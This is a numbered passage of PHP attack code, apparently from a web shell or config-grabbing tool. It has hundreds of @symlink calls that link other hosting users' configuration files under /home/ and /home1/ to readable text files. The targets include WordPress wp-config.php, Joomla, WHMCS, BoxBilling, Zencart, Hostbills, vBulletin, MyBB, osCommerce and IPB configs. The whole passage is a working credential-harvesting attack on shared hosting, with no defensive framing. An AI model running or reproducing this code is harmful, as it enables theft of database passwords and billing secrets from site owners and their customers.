  735. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  736. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  737. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  738. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  739. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  740. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  741. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  742. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  743. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  744. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  745. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  746. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  747. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  748. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  749. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  750. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  751. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  752. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  753. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  754. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  755. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  756. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  757. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  758. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  759. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  760. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  761. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  762. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  763. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  764. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  765. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  766. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  767. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  768. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  769. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  770. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  771. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  772. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  773. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  774. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  775. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  776. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  777. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  778. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  779. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  780. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  781. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  782. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  783. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  784. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  785. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  786. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  787. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  788. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  789. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  790. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  791. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  792. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  793. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  794. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  795. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  796. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  797. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  798. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  799. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  800. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  801. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  802. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  803. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  804. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  805. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  806. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  807. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  808. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  809. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  810. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  811. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  812. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  813. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  814. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  815. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  816. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  817. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  818. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  819. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  820. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  821. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  822. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  823. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  824. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  825. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  826. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  827. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  828. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  829. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  830. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  831. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  832. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  833. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  834. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  835. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  836. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  837. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  838. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  839. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  840. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  841. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  842. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  843. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  844. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  845. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  846. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  847. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  848. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  849. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  850. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  851. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  852. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  853. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  854. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  855. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  856. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  857. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  858. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  859. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  860. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  861. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  862. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  863. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  864. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  865. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  866. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  867. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  868. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  869. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  870. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  871. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  872. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  873. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  874. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  875. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  876. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  877. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  878. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  879. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  880. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  881. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  882. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  883. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  884. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  885. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  886. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  887. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  888. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  889. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  890. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  891. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  892. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  893. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  894. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  895. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  896.  
  897. //Home1
  898.  
  899. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  900. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  901. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  902. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  903. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  904. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  905. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  906. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  907. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  908. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  909. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  910. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  911. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  912. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  913. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  914. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  915. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  916. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  917. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  918. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  919. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  920. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  921. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  922. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  923. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  924. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  925. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  926. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  927. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  928. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  929. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  930. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  931. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  932. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  933. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  934. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  935. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  936. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  937. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  938. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  939. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  940. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  941. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  942. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  943. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  944. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  945. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  946. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  947. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  948. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  949. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  950. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  951. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  952. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  953. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  954. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  955. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  956. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  957. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  958. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  959. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  960. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  961. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  962. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  963. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  964. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  965. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  966. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  967. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  968. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  969. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  970. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  971. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  972. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  973. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  974. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  975. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  976. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  977. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  978. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  979. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  980. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  981. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  982. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  983. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  984. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  985. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  986. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  987. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  988. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  989. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  990. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  991. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  992. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  993. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  994. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  995. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  996. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  997. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  998. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  999. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1000. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1001. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1002. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1003. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1004. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1005. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1006. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1007. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1008. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1009. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1010. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1011. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1012. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1013. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1014. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1015. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1016. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1017. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1018. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1019. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1020. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1021. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1022. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1023. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1024. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1025. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1026. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1027. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1028. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1029. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1030. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1031. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1032. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1033. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1034. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1035. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1036. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1037. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1038. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1039. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1040. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1041. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1042. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1043. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1044. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1045. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1046. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1047. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1048. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1049. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
